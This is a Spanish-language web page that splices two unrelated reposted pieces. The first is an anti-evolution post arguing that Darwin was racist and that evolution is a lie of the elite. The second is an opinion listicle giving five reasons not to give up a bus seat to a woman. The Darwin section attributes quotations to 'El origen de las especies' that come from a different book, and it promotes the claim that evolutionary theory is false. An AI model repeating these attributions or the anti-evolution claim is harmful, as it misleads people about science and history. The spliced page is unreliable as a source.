Los evolucionistas aseguran que Darwin nunca fue racista, pero lo cierto es que sus trabajos contienen ideas inequívocas. Por ejemplo, en El origen de las especies leemos: «En algún momento de un futuro no muy distante, casi con toda certeza, las razas humanas civilizadas exterminarán y reemplazarán a las razas que viven en las comunidades salvajes de todo el mundo… La diferencia entre el hombre y sus parientes más cercanos será cada vez mayor; por esto, la diferencia entre un hombre caucásico, en un estado más civilizado –como es de desear– y un mono tan bajo como el mandril será como la existente ahora entre un negro o australiano y un gorila». O esta otra: «Construimos asilos para los imbéciles, tullidos y enfermos; instituimos leyes protectoras del pobre; y nuestros médicos se esmeran al máximo para salvar la vida de toda esa gente… De hecho, hay razones para creer que la vacunación ha preservado a muchos individuos de constitución física débil, que de otro modo habrían sucumbido ante enfermedades comunes, como la viruela… Protegidas de esa manera, muchas personas débiles fueron capaces de propagar su linaje, pero nadie que haya prestado atención a la cría de animales domésticos dudaría de que esto (el cuidado y la salvación de los débiles) tiene que ser muy nocivo para la raza humana».
Recuerde, NO NIEGUE, NO RIDICULICE, NO SE ENOJE… ANALICE CON SU RAZON Y EVALUE CON SU CORAZON.
Dejo a Ustedes el siguiente link, a fin de, quien lo desee, pueda continuar ampliando el tema :http://www.taringa.net/posts/info/12205829/La-teoria-de-la-evolucion-es-falsa.html

Fuente: http://konstantino.blogdiario.com/1399615928/informe-10-otra-mentira-de-la-elite-teoria-de-la-evolucion-de-charles-darwin-/

CINCO RAZONES PARA NO CEDERLE EL ASIENTO A UNA MUJER

¿Alguna vez te ha pasado que por no cederle el asiento a una dama aparentemente sin discapacidad o embarazo se te ha quedado mirando todo el bus como si hubieras cometido un homicidio? En nuestro país y varios otros de la región es algo común. Sin embargo, se trata de algo que deberíamos desterrar, si queremos apuntar a una igualdad de sexos, y con ello de deberes y derechos. Recordemos que la silueta de una mujer no se encuentra entre los clásicos stickers de “Asiento reservado” que se pegan en las lunas.
En algunos países más desarrollados, por ejemplo, el asiento no se cede, se pide. Y claro, se pide por razones médicas que escapan a la vista o similares. Porque cederlo debería tener poco que ver con la caballerosidad, como se nos ha acostumbrado a escuchar. En cambio, tiene que ver con la amabilidad y el criterio: uno debería ceder el asiento a quien vea que lo necesite, independientemente de su sexo.  Una mujer podría (sin tener tampoco la obligación de), por ejemplo, ceder su asiento a un hombre que carga muchos paquetes, o quizás sugerirle ayudarle con ellos y viceversa. Pero no nos vayamos en floro aún. En la siguiente nota encontrarás los cinco motivos para no cederle el asiento a una mujer, porque la sociedad lo manda. Está de más decir (pero lo haremos igual, por si las moscas) que a personas con discapacidad, adultos mayores y mujeres embarazadas sí debes de cederles el asiento, no solo por ley sino por convicción.
1. HACER VALER TU ESFUERZO
No es ningún secreto que tanto hombres como mujeres nos esforzamos siempre por obtener las cosas que más nos convienen. Esto se aplica bastante a la hora de viajar en transporte público: salimos temprano de casa o del trabajo para evitar el tráfico y buses llenos, hacemos colas (algo que se ha hecho más frecuente con los nuevos medios de transporte que han ido apareciendo en la ciudad) y esperamos por el bus correcto (el que nos parezca más vacío, en el que posiblemente encontremos una mejor ubicación). Ah, pero más importante aún: pagamos un pasaje, lo que también significa un derecho a obtener asiento. Todo lo mencionado arriba no son pequeñas cosas si se piensa bien, valen un esfuerzo, y un asiento (o un viaje cómodo) es el resultado de él. ¿Por qué cederlo tan fácilmente?


2. TAMBIÉN TIENES DERECHO A ESTAR CANSADO

    Para muchas mujeres, e incluso para algunos hombres, la siguiente escena es terrible: un hombre desparramado en su asiento metiéndose una rica jateada, mientras una mujer a su lado se encuentra de pie sostenida del pasamanos. ¿Y si fuese al revés, también te parecería mal? En realidad, sí te parece mal eres bien machista, de esos que piensan que la mujer es el sexo débil. ¿No tienen los hombres el mismo derecho que las mujeres a estar cansados? Pocas veces uno se pone en su lugar pero, ¿no son humanos? ¿No se enferman también?


    3. LAS MUJERES PUEDEN SENTIRSE OFENDIDAS

      Sí, porque en varias partes del mundo –y en menor medida, en nuestro país– esta caballerosidad chapada a la antigua ha dejado de ser una práctica común. Incluso algunas mujeres encuentran el gesto humillante. Esto porque hoy ellas toman mayor conciencia de la capacidad que tienen para hacer las cosas: “¿Acaso por permanecer parada siendo mujer me voy a romper?”. Aunque no lo creas, hay mujeres que piensan así, pero de todas formas aceptan el anticuado gesto para no dejarte mal (parado). Pero eso no es todo, están también las que creen que cederles el asiento es tu forma de sacar plan. O podría pasar que le des el asiento a una mujer “embarazada” y esta te mire mal porque no esté esperando, solo un poquito subida de peso… No, pues.


      4. PARADO PUEDES PASAR POR “PUNTEADOR”

        Para los no-mañosos puede ser un martirio ir en un bus repleto de gente. Y es que últimamente con tanto caso de pervertido en Internet y en las noticias hay que andar con mucho cuidado para no pasar, por accidente, como uno de ellos. En los buses, el más mínimo roce –quizás para llegar a la puerta del vehículo– puede ser percibido como si existieran segundas intenciones, por más que no sea el caso. “¡Pero el bus está lleno!”. No señor, estás fregado: Te meten preso y tu cacharro se vuelve viral en Facebook. Así como así, te convertiste en “El punteador del Corredor Azul”. Sentadito, a no ser que verdaderamente seas un enfermo sexual, nadie te acusará de nada.


        5. ¿LE DARÍAS EL ASIENTO A UN HOMBRE DE TU EDAD EN BUENA CONDICIÓN FÍSICA?

          Si la respuesta es “no”, ya sabes lo que sigue. Pero te lo decimos de todos modos: las mujeres no son de ninguna manera menos capaces de permanecer de pie que un hombre. Cederles el asiento sin motivo, solo por cumplir con un protocolo establecido por una sociedad machista (suena irónico pero así es), será simplemente seguir malacostumbrando a aquellas mujeres que creen que se merecen tu asiento solo porque nacieron mujeres. Sonará súper masculinista (sí, existe el término) pero ellas piden equidad, así que ¿por qué no dársela en todos los aspectos?

          Fuente: dedomedio.com
          http://tac3news.com/cinco-razones-para-no-cederle-el-asiento-a-una-mujer/